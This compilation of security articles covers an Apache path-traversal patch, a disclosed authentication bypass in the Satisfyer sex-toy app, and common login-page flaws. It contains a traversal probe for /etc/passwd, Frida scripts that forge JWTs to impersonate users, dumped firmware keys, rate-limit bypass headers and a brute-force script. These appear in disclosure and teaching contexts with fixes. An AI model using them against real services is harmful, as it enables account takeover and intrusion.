New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE Attacks

Original text by Ravie Lakshmanan

The Apache Software Foundation on Thursday released additional security updates for its HTTP Server product to remediate what it says is an "incomplete fix" for an actively exploited path traversal and remote code execution flaw that it patched earlier this week.

The new vulnerability, tracked as CVE-2021-42013, builds upon CVE-2021-41773, a flaw that impacted Apache web servers running version 2.4.49 and involved a path normalization bug that could enable an adversary to access and view arbitrary files stored on a vulnerable server.

Although the flaw was addressed by the maintainers in version 2.4.50, a day after the patches were released it became known that the weakness could also be abused to gain remote code execution if the "mod_cgi" module was loaded and the configuration "require all denied" was absent, prompting Apache to issue another round of emergency updates.

"It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives," the company noted in an advisory. "If files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution."

Apache credited Juan Escobar from Dreamlab Technologies, Fernando Muñoz from NULL Life CTF Team, and Shungo Kumasaka for reporting the vulnerability. In light of active exploitation, users are highly recommended to update to the latest version (2.4.51) to mitigate the risk associated with the flaw.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said it's "seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation," urging "organizations to patch immediately if they haven't already."
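The bypass boils down to a second layer of URL encoding: the sequence %%32%65 decodes once to %2e and a second time to a plain dot, slipping past the 2.4.50 path check. A short Python sketch of how the widely published probe path decodes (the target file is illustrative only):

```python
from urllib.parse import unquote

# How the doubly-encoded dot behind CVE-2021-42013 decodes. Each
# ".%%32%65" path segment eventually collapses into "..".
def build_probe_path(depth=4, target="etc/passwd"):
    """Build a traversal probe from doubly-encoded dot segments."""
    return "/cgi-bin/" + "/".join([".%%32%65"] * depth) + "/" + target

path = build_probe_path()
once = unquote(path)    # "%%32%65" -> "%2e", so each segment becomes ".%2e"
twice = unquote(once)   # "%2e" -> ".", yielding plain "../" segments
```

Double-decoding the probe yields `/cgi-bin/../../../../etc/passwd`, which is why a server that decodes twice maps the request outside its configured directories.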

Analysis of Satisfyer Toys: Discovering an Authentication Bypass with r2 and Frida

Original text by bananamafia

There’s no good way to start a blog post like this, so let’s dive right in:

Recently, I rediscovered the butthax talk, which covered security aspects of Lovense devices. I felt so inspired that I decided to buy some Satisfyer devices and check out how they work.

These are app-controllable toys that are sold globally, first and foremost in Germany and all over the EU. They have some pretty interesting functionality:

  • Control the device via Bluetooth using an Android app. According to the description it’s a sexual joy and wellness app like no other. o_O
  • Create an account, find new friends and exchange messages and images. Given the nature of this app, it’s quite interesting that Google Play allows everyone above 13 to download and use this app. Well OK.
  • Start remote sessions and allow random dudes from the Internet or your friends to control the Satisfyer.
  • Perform software updates.

Throughout this post, I’ll shed some light on how various aspects of some of these features work. Most importantly, I’ve found an authentication bypass vulnerability that can result in an account takeover. This would have allowed me to forge authentication tokens for every user of the application.

Let’s start with some simple things first.

Bluetooth Communication

Communication between an Android device and a Satisfyer is handled via Bluetooth LE. The app implements many Controller classes for various tasks, like handling low battery status or controlling the device’s vibration. For example, the ToyHolderController class, like many others, implements the sendBuffer() method to send byte buffers to the device. The buffer contents can be logged with the following Frida script:

Java.perform(function() {

    var stringbuilderclazz = Java.use('java.lang.StringBuilder');

    var clazz = Java.use("com.coreteka.satisfyer.ble.control.ToyHolderController");
    clazz.sendBuffer.overload("java.util.List").implementation = function(lst) {

        console.log("[*] sendBuffer(lst<byte>)");

        // build a printable representation of the list of byte lists
        var stringbuilder = stringbuilderclazz.$new();
        stringbuilder.append(lst.toString());
        console.log("Buffer: " + stringbuilder.toString());

        // call the original implementation
        return this.sendBuffer(lst);
    };
});

Which yields:

[*] sendBuffer(lst<byte>)
Buffer: [[33, 33, 33, 33], [25, 25, 25, 25]]

Each list is associated with a specific motor of a Satisfyer. The values in a list control the vibration levels for a specific time frame.

It seems that 66 is the maximum value for the vibration level. As an example of how the communication can be manipulated with Frida, I decided to modify the list of bytes sent to the device to use the value 100 instead:

Java.perform(function() {

    var stringbuilderclazz = Java.use('java.lang.StringBuilder');
    var arraylistclazz = Java.use('java.util.ArrayList');
    var byteclazz = Java.use('java.lang.Byte');

    var clazz = Java.use("com.coreteka.satisfyer.ble.control.ToyHolderController");
    clazz.sendBuffer.overload("java.util.List").implementation = function(lst) {

        // create a new byte list containing the value 100 four times
        var byteList = arraylistclazz.$new();
        var theByte = byteclazz.valueOf(100);
        for (var i = 0; i < 4; i++) {
            byteList.add(theByte);
        }

        // replace both motor buffers with the crafted list
        lst.set(0, byteList);
        lst.set(1, byteList);

        var stringbuilder = stringbuilderclazz.$new();
        stringbuilder.append(lst.toString());
        console.log("Buffer: " + stringbuilder.toString());

        // call the original method with the modified parameter
        return this.sendBuffer(lst);
    };
});

This worked and changed the script's output to:

[*] sendBuffer(lst<byte>)
Buffer: [[100, 100, 100, 100], [100, 100, 100, 100]]

Passing negative values, overly long lists, or similar malformed input simply caused the device to ignore it.

At this point, other commands sent to the Satisfyer could be altered as well. As can be seen, the easiest way to perform this kind of manipulation is changing values before passing them to the low-level functions of the Bluetooth stack.

Internet Communication

I’ve analyzed the API and authentication flow using decompiled code and Burp. To make this work, I’ve utilized the Universal Android SSL Pinning Bypass script.

JWT Authentication

Each request sent to the server has to be authenticated using a JWT. It’s interesting that the client and not the server is responsible for generating the initial JWT:

public final class JwtTokenBuilder {

    private final native String getReleaseKey();

    public final String createJwtToken() {
        Date date = new Date(new Date().getTime() + (long)86400000);
        Object object = "prod".hashCode() != 3449687 ? this.getDevKey() : this.getReleaseKey();
        Charset charset = d.a;
        if (object != null) {
            object = ((String)object).getBytes(charset);
            l.b(object, "(this as java.lang.String).getBytes(charset)");
            object = Keys.hmacShaKeyFor((byte[])object);
            object = Jwts.builder().setSubject("Satisfyer").claim("auth", "ROLE_ANONYMOUS_CLIENT").signWith((Key)object).setExpiration(date).compact();
            return object;
        }
        // [...]
    }
}

As can be seen, createJwtToken() uses a JWT signing key originating from a native library, then builds and signs a token with the subject Satisfyer and the role ROLE_ANONYMOUS_CLIENT.


After reviewing the authentication flow, I’ve determined that there exist (at least) these roles:

  • ROLE_ANONYMOUS_CLIENT is any client that communicates with the Satisfyer API and is not logged in.
  • ROLE_USER is a client that has successfully logged in. Every API request is scoped to information that's accessible to this specific user account.

While the Android app is responsible for generating the initial JWT with role ROLE_ANONYMOUS_CLIENT, the server responds with a new JWT after a successful login. This new JWT uses the role ROLE_USER and is scoped to the authenticated account.

Would it be possible to use the signing key residing in the shared library to sign JWTs not just with ROLE_ANONYMOUS_CLIENT, but also with ROLE_USER? This would allow an attacker to interact with the API in the name of someone else. Let's find out.
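To make the idea concrete, here is a minimal, stdlib-only Python sketch of what forging such a token would look like. The signing key and the victim's details are placeholders; the claim names (sub, auth, user_id) follow the decompiled token builder and the attack plan described later:

```python
import base64
import hashlib
import hmac
import json
import time

def b64url(data: bytes) -> str:
    # base64url without padding, as used in JWTs
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_jwt(signing_key: bytes, subject: str, user_id: int) -> str:
    """Sign an HS256 JWT with forged claims (all inputs are placeholders)."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps({
        "sub": subject,                   # victim's account name
        "auth": "ROLE_USER",              # instead of ROLE_ANONYMOUS_CLIENT
        "user_id": user_id,               # victim's numeric user ID
        "exp": int(time.time()) + 86400,  # 24 hours, as in createJwtToken()
    }).encode())
    sig = hmac.new(signing_key, f"{header}.{payload}".encode(),
                   hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"

token = forge_jwt(b"placeholder-signing-key", "victim", 1234)
```

With the real key from the shared library, a server that verifies every token with that single key would accept this forgery.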

Determining the User ID of a Victim

We need two things to forge a JWT for any given account:

  • The account name
  • The user ID of the account

Starting from an account name, determining the user ID is as simple as searching for the account using this API endpoint:

User Search

This can be done by any user with a valid session as ROLE_USER. Please note the value of the statusDescription in the server’s response.

Creating Forged JWTs with Frida

See, I’m lazy banana man. So instead of dumping the key and creating the JWT myself, I’ve used Frida to instrument the Satisfyer app to do this for me instead.

The app uses a class implementing the JwtBuilder interface to create and sign JWTs. The only class implementing this interface is DefaultJwtBuilder, so I’ve added hooks in there. The plan is as follows:

  • Add a hook to change the auth claim from ROLE_ANONYMOUS_CLIENT to ROLE_USER.
  • Add a hook to add another claim called user_id, indicating the desired user ID of the victim’s account.
  • Change the JWT subject (sub) from Satisfyer (as it’s used for anonymous users) to the account name of the victim.

I came up with this Frida script:

Java.perform(function() {
    var clazz = Java.use("io.jsonwebtoken.impl.DefaultJwtBuilder");
    clazz.claim.overload("java.lang.String", "java.lang.Object").implementation = function(name, val) {
        console.log("[*] Entered claim()");

        var Integer = Java.use("java.lang.Integer");

        // the user ID of the victim
        var intInstance = Integer.valueOf(282[...]);

        // modify the "auth" claim and add another claim for "user_id"
        var res = this.claim(name, "ROLE_USER").claim("user_id", intInstance);

        return res;
    };

    var claimsClazz = Java.use("io.jsonwebtoken.impl.DefaultClaims");
    claimsClazz.setSubject.overload("java.lang.String").implementation = function(sub) {
        console.log("[*] Entered setSubject()");

        // modify the subject from "Satisfyer" (anonymous user) to the victim's user name
        return this.setSubject("victim[...]");
    };

    // Trigger JWT generation
    var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
    var jwtTokenBuilder = JwtTokenBuilderClass.$new();
    console.log("[*] Got Token:");
    console.log(jwtTokenBuilder.createJwtToken());

    console.log("[+] Hooking complete");
});

This worked just fine and generated a forged JWT when starting the app:

$ python3
[+] Got PID 19213
[*] Entered setSubject()
[*] Entered claim()
[*] Got Token:
[+] Hooking complete

Using the Forged JWT

After creating a JWT for my test account, I’ve simply changed the account’s status message:

Set Status

Checking the status text of the victim revealed that this actually worked 😀

To create this screenshot, I had to use another Frida script to remove the secure flag from the View class which is used to block the ability to take screenshots.

Using the API is fine and all, but I wanted to inject the forged token into the running app, so that I could use features like remote control and calls more easily. I came up with a Frida script to generate and add a forged JWT into the app’s local storage. This happens just before the app is going to check if a valid JWT already exists using the hasToken() method:

var clazz = Java.use("");
clazz.hasToken.overload().implementation = function() {

    // create new forged token using the hooks described before
    var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
    var jwtTokenBuilder = JwtTokenBuilderClass.$new();
    // createJwtToken() is hooked as well, see above for snippets
    var token = jwtTokenBuilder.createJwtToken();

    // inject token into shared preferences and add bogus values to make the app happy
    // [...]

    return this.hasToken();
};

The following demo shows the attacker’s phone on the left and the tablet of another dude on the right. Let’s call that dude Antoine.

  1. The attacker is logged in with some random account that’s not relevant for the attack. This account has no friends.
  2. Antoine has a friend in the friends list called victim. In this case, victim refers to the account that is about to be impersonated.
  3. The Frida script is injected into the attacker’s app. It restarts the app and forges a JWT for the victim account. After that, it gets injected into the session storage. At this point, the attacker impersonates the account of victim.
  4. Suddenly, the attacker has a friend in the friends list. This is the account of Antoine, since victim is a friend of his.
  5. The attacker can now message and call Antoine in the name of victim and could control the Satisfyer of Antoine in the name of victim. For this to work, Antoine has to grant access to the caller first, but since he and victim are friends, that should be totally safe, right?

Fear my video editing skillz.

To summarize, the impact is quite interesting, since an attacker can pose as any given user. Besides the ability to send messages as that user, access to the friends list of the compromised account becomes possible as well. This means that, in case someone has granted remote dildo access to the compromised account over the Internet, the attacker could hijack this and control the Satisfyer of another person. After all, the attacker is able to initiate remote sessions as any user.

In the unlikely event that a victim realizes their account is being impersonated, even changing the password doesn't help, since the attack doesn't require knowing the password at all.

Note: I’ve only tested and verified this using my own test accounts, I’m not interested in controlling your Satisfyers, sorry.

Possible Mitigation

This issue can be mitigated entirely on the server side, since this is the component responsible for verifying JWT signatures:

  1. Although it’s weird, users that are not logged in could still generate and sign their own JWTs on app startup.
  2. After successful authentication, the server replies with a new JWT that’s valid for the respective user account.
  3. JWTs like this, with roles other than ROLE_ANONYMOUS_CLIENT, should be signed and verified with another key that never leaves the server.

This way, no changes to the app should be required. It wouldn’t be possible to forge JWTs anymore, since now two different signing keys are in use for anonymous and authenticated clients.
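A hypothetical sketch of this server-side key separation, with placeholder keys and a stdlib-only HS256 implementation (the real server-side code is unknown):

```python
import base64, hashlib, hmac, json

ANON_KEY = b"key-shipped-in-the-app"      # placeholder value
USER_KEY = b"key-known-only-to-server"    # placeholder value

def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _unb64url(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def sign(key: bytes, claims: dict) -> str:
    """Sign an HS256 JWT over the given claims."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"

def verify(token: str) -> dict:
    """Pick the verification key based on the token's role claim."""
    header, payload, sig = token.split(".")
    claims = json.loads(_unb64url(payload))
    key = ANON_KEY if claims.get("auth") == "ROLE_ANONYMOUS_CLIENT" else USER_KEY
    good = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(good, _unb64url(sig)):
        raise ValueError("invalid signature")
    return claims
```

With this split, a ROLE_USER token signed with the app-side key no longer verifies, so leaking the key in the APK only affects anonymous tokens.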

Dumping the JWT Signing Key

For completeness' sake, I've dumped the JWT signing key using various methods. This key can then be used in external applications to create signed JWTs without relying on Frida and the Android application itself.

The Static Way with radare2

The easiest way is to extract the key statically:

$ r2 -A
Warning: run r2 with -e bin.cache=true to fix relocations in disassembly
[x] Analyze all flags starting with sym. and entry0 (aa)
[0x000009bc]> afl
0x00000b40    1 20           sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey
[0x00000a98]> s sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey
[0x00000b40]> pdf
            ; UNKNOWN XREF from section..dynsym @ +0x98
┌ 20: sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey (int64_t arg1);
│           ; arg int64_t arg1 @ x0
│           0x00000b40      080040f9       ldr x8, [x0]                ; 0xc7 ; load from memory to register; arg1
│           0x00000b44      01000090       adrp x1, 0
│           0x00000b48      210c2191       add x1, x1, str.7fe6a81597158366[...] ; 0x843 ; "7fe6a81597158366[...]" ; add two values
│           0x00000b4c      029d42f9       ldr x2, [x8, 0x538]         ; 0xcf ; load from memory to register
└           0x00000b50      40001fd6       br x2
[0x00000b40]> pxq @ 0x843
0x00000843  0x3531386136656637  0x3636333835313739   7fe6a81597158366

As you can see, a static key is loaded from address 0x843.

That was too easy, let’s check other methods to dump the key.

The Dynamic Way with Frida

As can be seen in one of the listings above, the Java method getReleaseKey() is declared as native. This means that the implementation of this function is present in a shared library that contains native code.

Calling things from the Java world into the native layer happens via JNI. Instead of bothering with the actual native implementation, Frida can be used to just call the native Java method and dump the returned value. This can be accomplished with the following script:

var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
var jwtTokenBuilder = JwtTokenBuilderClass.$new();
console.log("Release Key: " + jwtTokenBuilder.getReleaseKey());

Another way is to use the Frida Interceptor to print the value returned by the getReleaseKey() export of the native library, outside of the Java layer:

Interceptor.attach(Module.findExportByName("", "Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey"), {
    onEnter: hookEnter,
    onLeave: hookLeave
});

function hookEnter(args) {
    console.log("[*] Enter getReleaseKey()");
}

function hookLeave(ret) {
    console.log("[*] Leave getReleaseKey()");

    // if it would return a byte[] instead of a String, one could use:

    // cast ret as byte[]
    var buffer = Java.array('byte', ret);
    var result = "";
    for (var i = 0; i < buffer.length; ++i) {
        result += String.fromCharCode(buffer[i]);
    }
    console.log(result);
}

An Alternative Way using r2Frida

Let’s just assume that there are more complex things going on than simply returning a hardcoded string. A neat way to debug and trace the key generation would involve using r2Frida to dump memory and register contents when executing specific instructions. In this specific case, the contents of the x1 register at offset 0xb4c are of interest.

The plan is as follows:

  • Attach to the running app with r2Frida
  • Get the base address of the shared library
  • Add the offset 0xb4c to this address
  • Add a trace command for this address to dump the contents of the x1 register
  • Trigger the key generation

Let's see how it works:

After triggering the generation of a JWT, tracing kicks in and dumps the value of x1, which is a pointer to the hardcoded string.

As you can see, there are many ways Frida and r2Frida can be utilized to accomplish the same task. Depending on the target and requirements, these methods all have different advantages and disadvantages.

WebRTC via coturn

An interesting feature of the Satisfyer ecosystem is that the app offers different ways to communicate with remote peers:

  • End-to-End encrypted chats that support file attachments.
  • Calls via WebRTC that support controlling other people’s Satisfyer devices.

The latter feature depends on an internet-facing TURN (Traversal Using Relays around NAT) server that acts as a relay. Checking out hardcoded constants in the app source code reveals the following connection information:

public static final String TURN_SERVER_LOGIN = "admin";
public static final String TURN_SERVER_PASSWORD = "[...]";
public static final String TURN_SERVER_URL = "turn:t1.[...].com:3478";

As mentioned in the coturn readme file, one should use temporary credentials generated by the coturn server to allow client connections:

In the TURN REST API, there is no persistent passwords for users. A user has just the username. The password is always temporary, and it is generated by the web server on-demand, when the user accesses the WebRTC page. And, actually, a temporary one-time session only, username is provided to the user, too.

This sounds different from what the Satisfyer app is currently doing, since it uses an admin account with a static password. In fact, coturn servers offer an HTTPS-only web interface that allows admin users to log in. Among other things, this access could allow viewing connection details of peers connected to the TURN server. Let's just hope this panel is not accessible, right? RIGHT?
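For reference, the temporary credentials described in coturn's TURN REST API documentation can be derived like this (shared secret and username are placeholders; the scheme is username = "expiry-timestamp:user", password = base64(HMAC-SHA1(secret, username))):

```python
import base64
import hashlib
import hmac
import time

def turn_rest_credentials(shared_secret: str, user: str, ttl: int = 3600):
    """Derive ephemeral TURN credentials per coturn's TURN REST API scheme.

    The shared secret stays on the server; clients only ever see
    short-lived username/password pairs instead of a static admin login."""
    username = f"{int(time.time()) + ttl}:{user}"
    digest = hmac.new(shared_secret.encode(), username.encode(),
                      hashlib.sha1).digest()
    return username, base64.b64encode(digest).decode()

username, password = turn_rest_credentials("server-side-secret", "alice")
```

Had the app used this mechanism, no long-lived admin credentials would need to be hardcoded in the APK at all.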

I’ve reported this and the vendor replied that they might patch this in the near future.

Software Updates and DFU Mode

Satisfyer devices support OTA updates, which allow the Android app to flash a new firmware via the DFU (Device Firmware Update) mode. Activating the DFU mode requires two things:

  • Bluetooth pairing was completed successfully.
  • Using a special DFU key to make a Satisfyer switch into DFU mode.

Guess where the DFU key comes from. Right, the same shared library:

var DfuKeyClass = Java.use("com.coreteka.satisfyer.ble.firmware.SettingsHelper");
var dfuKey = DfuKeyClass.$new();
console.log("DFU Key Generation 0: " + dfuKey.getDfuKey(0));
console.log("DFU Key Generation 1: " + dfuKey.getDfuKey(1));

Here are the keys I’ve dumped:

DFU Key Generation 0: 4E46F8C5092B29E29A971A0CD1F610FB1F6763DF807A7E70960D4CD3118E601A
DFU Key Generation 1: 4DB296E44E3CD64B003F78E584760B28B5B68417E5FD29D2DB9992618FFB62D5

These keys are static and specific for device generations 0 and 1.

All that’s left to flash something into a test device is a firmware package of the vendor. Unfortunately, all of my Satisfyer devices were already shipped to me with up-to-date firmware. There’s an API endpoint that allows downloading firmware images but it requires brute forcing various parameter values and I don’t want to do that 😀

A quick idea was to order an old Satisfyer but then I’ve noticed that buying items like these in used condition is very weird :S.

Messing with OTA and DFU

I've found a way to trigger the update process, namely by calling updateFirmware(path) of the ToyHolderController class. A great way to see what's actually going on is to place hooks in the classes used for logging. In the case of Satisfyer Connect, the ZLogger class is used in many places to produce debug messages. This is what triggering the update process with a test file looks like:

[ZLogger]: filePath=/data/local/tmp/123.bin, startAddr=56, icType=5
[ZLogger]: headBuf=050013370101C28E04400000
[ZLogger]: icType=0x05, secure_version=0x00, otaFlag=0x00, imageId=0x0101, imageVersion=0x00000000, crc16=0x8ec2, imageSize=0x00004004(16388)
[ZLogger]: image: 1/1   {imageId=0x0000, version=0x0000}        progress: 0%(0/0)
[ZLogger]: OTA
[ZLogger]: image: 1/1   {imageId=0x0101, version=0x0000}        progress: 0%(0/16388)
[ZLogger]: Ota Environment prepared.
[ZLogger]: DFU: 0x0205 >> 0x0206(PROGRESS_REMOTE_ENTER_OTA)
[ZLogger]: << OPCODE_ENTER_OTA_MODE(0x01), enable device to enter OTA mode
[ZLogger]: [TX]0000ffd1-0000-1000-8000-00805f9b34fb >> (1)01
[ZLogger]: 0x0000 - SUCCESS << 0000ffd1-0000-1000-8000-00805f9b34fb
[ZLogger]: 4C:XX:XX:XX:XX:XX, status: 0x13-GATT_CONN_TERMINATE_PEER_USER , newState: 0-BluetoothProfile.STATE_DISCONNECTED

Based on the debug messages, I’ve started to build a file that can be flashed on the device. I’ve lost interest in that shortly after but in case my results are helpful for anyone, you can check my Python script to generate such a file below:

#!/usr/bin/env python3

FILE = b""

# header
FILE += b"\x47\x4D"

# sizeOfMergedFile
FILE += b"\x3e\x00\x00\x00"

# extension
FILE += b"\x05\x05"

# subFileIndicator
# 42 = count
# startOffset 0 (count * 12 + 44)
FILE += b"\x01\x00\x00\x00"

# start addr
FILE += b"\x10\x00"

# download addr
FILE += b"\x10\x00"

FILE += b"\x05\x00\x00\x00"

FILE += b"ZZaa"

### image file 1

# ic version
FILE += b"\x05"

# secure version
FILE += b"\x00"

# no idea
FILE += b"\x13\x37"

# image id
FILE += b"\x01\x01"

# crc16
FILE += b"\x8e\x04"

# size
FILE += b"\x40\x00\x00\x00"

# payload
FILE += b"A" * 0x40

with open("./thefile.bin", "wb") as f:
    f.write(FILE)

If anybody happens to have a flashable Satisfyer .bin file lying around, I’ll offer $13.37 PayPal for it, I swear.

Disclosure Timeline

  • 06/11/2021: Sent report for insecure coturn setup with hardcoded admin password to
  • 06/18/2021: Received notification that this issue might be addressed in the future.
  • 06/19/2021: Sent report for authentication bypass vulnerability to
  • 06/25/2021: Added additional details to report and asked for acknowledgement (again).
  • 06/30/2021: Sent info that blog post may be released soon to and
  • 06/30/2021: Received acknowledgement, agreed that blog post will be released in max. two weeks, or before in case the vulnerability was fixed earlier.
  • 07/14/2021: Publishing blog post.

10 Most Common Security Issues Found in Login Functionalities

Original text by Harsh Bothra

During penetration testing and vulnerability assessment, the login functionalities are often encountered in some way or another. Most of the time, they are public-facing login portals where any user can attempt to log in to gain access to their accounts; on the other hand, sometimes, these login panels are restricted to specific users. The login functionality acts as a gateway that you need to unlock successfully to further access the application to its full potential. From a threat actor’s perspective, the login functionality is the main barrier to gain an initial foothold. Hence, it is essential from a penetration tester’s perspective to ensure that the login functionality implemented in the application is robust and secure against all types of vulnerabilities and misconfigurations.

This blog will discuss the common vulnerabilities and misconfigurations that a threat actor can exploit in login functionality, along with some remediations for them, following the mindmap shown above.

Vulnerability Test Cases

Default Credentials

Often, admin panels, third-party software integrations, etc. ship with a pair of default credentials that are left unchanged. This may allow an attacker to identify the third-party service and look up its default credentials. These credentials usually belong to privileged admin users and may allow an attacker to gain a complete foothold in the application.

Default Credentials List:

For example, an admin panel using default credentials such as “admin:admin” is easy to guess and may allow an attacker to gain access to the respective admin panel as the highest privileged user.

Remediation: To remediate this issue, the developers need to ensure that the default credentials are disabled/changed and a strong pair of non-guessable credentials are enforced.

User Enumeration

In many scenarios, when a user provides an invalid username, the application responds with a verbose error message stating that the user doesn't exist. There are other ways to identify valid usernames as well, such as:

  1. Error Message: Difference in the error message when a valid/invalid user name is provided.
  2. Timing Difference: Difference in server response timing when a valid/invalid user name is provided.
  3. Application-Specific Behaviour: In specific scenarios, there may be behaviour patterns that are specific to the application’s implemented login flow, and it may require additional observation to conclude if a user exists or not.

These issues may allow a threat actor to enumerate all the valid users of the application and further use them to perform targeted attacks such as brute-forcing and social engineering.
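The timing variant can be demonstrated with a toy back end that only computes an expensive password hash when the username exists; every name, salt, and iteration count here is made up for illustration:

```python
import hashlib
import hmac
import time

# Toy back end: the password hash is only computed when the username
# exists, which is the classic source of a timing side channel.
USERS = {"alice": hashlib.pbkdf2_hmac("sha256", b"secret", b"salt", 50_000)}

def login(username, password):
    stored = USERS.get(username)
    if stored is None:
        return False  # fast path: leaks that the user doesn't exist
    guess = hashlib.pbkdf2_hmac("sha256", password.encode(), b"salt", 50_000)
    return hmac.compare_digest(guess, stored)

def measure(username):
    """Time a single failed login attempt for the given username."""
    start = time.perf_counter()
    login(username, "wrong-password")
    return time.perf_counter() - start
```

A failed attempt against "alice" takes measurably longer than one against a nonexistent user, which is enough signal to enumerate accounts. The fix is to perform the same amount of work on both paths.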

Remediation: To remediate this issue, the developers need to implement proper handling so that the application doesn't reveal a verbose error message for either a valid or an invalid username and only displays a generic message. Similarly, the timing difference should not be significant enough to allow user enumeration.

Missing Brute-Force Protection

Most of the time, the login pages are accessible to the world, and the application allows any user to register and log in. This increases the chance that some user has chosen a weak or guessable password. If an application allows login attempts irrespective of the number of failed attempts and never blocks them, it gives a threat actor a window of opportunity to perform a brute-force attack and guess the password of the victim user.

Bypass Methods: Often the application implements a rate-limiting or CAPTCHA mechanism to restrict brute-force attempts; however, there are multiple methods to bypass such implementations, including but not limited to:

  1. Using various HTTP request headers such as those listed below. You can find the top headers in the dataset from Project Resonance Wave 2.
    • X-Originating-IP:
    • X-Forwarded-For:
    • X-Remote-IP:
    • X-Remote-Addr:
    • X-Client-IP:
    • X-Host:
    • X-Forwarded-Host:
  2. Using null bytes (%00) in the vulnerable parameters
  3. Sending the request without captcha parameter
  4. Adding fake parameters with the same “key”:”value”
  5. Limiting the threads or checking for race conditions
  6. Changing user-agents, cookies, and IP address
  7. Using IP rotation Burp Extensions to bypass IP based restrictions

To test this issue, simply use Burp's Intruder feature or any custom brute-force script with a wordlist of around 200 passwords that includes the actual password. If the application doesn't restrict the invalid attempts and returns a successful response for the valid password, that is an indication that the application doesn't implement any sort of brute-force protection.
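A minimal sketch of such a custom brute-force script; login_attempt is a stub standing in for a real HTTP request (e.g. requests.post against the login endpoint), and the wordlist and "actual" password are invented:

```python
# Candidate passwords; a real test would load ~200 entries from a file.
WORDLIST = ["123456", "password", "letmein", "hunter2", "qwerty"]

def login_attempt(username, password):
    # Placeholder: simulate a server whose user has a weak password.
    return password == "hunter2"

def brute_force(username, wordlist):
    """Try every candidate; an app without lockout never stops us."""
    for candidate in wordlist:
        if login_attempt(username, candidate):
            return candidate
    return None

found = brute_force("victim", WORDLIST)
```

If `found` comes back non-None on a real target, every attempt went through unblocked and the protection is missing.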


Remediation: To remediate this issue, a developer may implement rate-limiting or CAPTCHA as an anti-automation mechanism.
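A simple sliding-window lockout illustrates the rate-limiting idea; the thresholds and key choice (account name vs. source IP) are made up:

```python
import time
from collections import defaultdict

# Lock a key (account or source IP) after too many recent failures.
MAX_FAILURES = 5
WINDOW_SECONDS = 300

failures = defaultdict(list)

def allow_attempt(key, now=None):
    """Return True while the key is under the failure threshold."""
    now = time.time() if now is None else now
    # forget failures that fell outside the sliding window
    failures[key] = [t for t in failures[key] if now - t < WINDOW_SECONDS]
    return len(failures[key]) < MAX_FAILURES

def record_failure(key, now=None):
    failures[key].append(time.time() if now is None else now)
```

A production implementation would persist this state (e.g. in Redis) and combine it with CAPTCHA, but the core logic is just this counter per window.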

Credentials Over Unencrypted Channel

If the application accepts the credentials and logs in a user over an unencrypted communication channel, i.e. over HTTP protocol instead of HTTPS, the communication is vulnerable to man in the middle attack. An attacker may be able to sniff in the network and steal sensitive information.


Remediation: To remediate this issue, the developers need to strictly enforce HTTPS so that the application doesn’t communicate over HTTP. As a best practice, the developers should implement HSTS headers across all the subdomains as well.

Additionally, implementing the Secure flag on session cookies issued after login over HTTPS ensures that the cookies are never sent over an unencrypted channel. The Secure flag protects cookies from being stolen over an unencrypted channel, for example via a man-in-the-middle attack.

Cross-Site Scripting

The login pages may also be vulnerable to cross-site scripting under multiple scenarios. However, these are generally authenticated but can still be used to perform malicious actions such as redirecting a user to an attacker-controlled website and social engineering them to get hold of their credentials.

Let's assume an application whose login page reflects the invalid username in the error message, and this username is also present in the URL. An attacker may then attempt reflected cross-site scripting in the user parameter by sending a malicious JavaScript payload.

Remediation: To remediate this issue the developers can implement a proper input validation and sanitising on the input fields and not reflect user-supplied input in the error messages.

Additionally, implementing an HttpOnly flag on the session cookies can protect sensitive cookies from being stolen via scripting attacks.

Parameter Pollution & Mass Assignment

A simple security misconfiguration may allow an attacker to bypass authentication and gain unauthorised access to a victim user's account. In this attack scenario, an attacker may attempt to bind multiple values to the same key or define multiple key-value pairs, e.g. supplying multiple usernames in one parameter or repeating the username parameter itself. Depending on how the server processes this, it may allow an attacker to access another user's account.
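Python's own query-string parsers illustrate how the "winning" value differs between implementations, which is exactly the discrepancy this attack exploits:

```python
from urllib.parse import parse_qs, parse_qsl

# The same polluted request body, seen by two different parsing styles.
query = "username=victim&username=attacker&password=guess"

all_values = parse_qs(query)["username"]        # keeps every value
last_wins = dict(parse_qsl(query))["username"]  # dict keeps the last one
```

Here `all_values` is `['victim', 'attacker']` while `last_wins` is `'attacker'`; a front end that validates the first value while the back end consumes the last one is exploitable.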


Remediation: To remediate this issue, the developers need to ensure that the application rejects requests containing multiple values for the same key and accepts only one at a time. Developers should also check whether any additional parameters were added to the original request and discard them, accepting only the originally expected parameters.
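To make the ambiguity concrete, here is a small Python sketch (the parameter name is illustrative) showing a defensive check that rejects a polluted query string carrying duplicated keys:

```python
from urllib.parse import parse_qs

def single_valued(query: str, key: str) -> str:
    """Accept the parameter only if it appears exactly once."""
    values = parse_qs(query).get(key, [])
    if len(values) != 1:
        raise ValueError(f"expected exactly one '{key}' parameter")
    return values[0]

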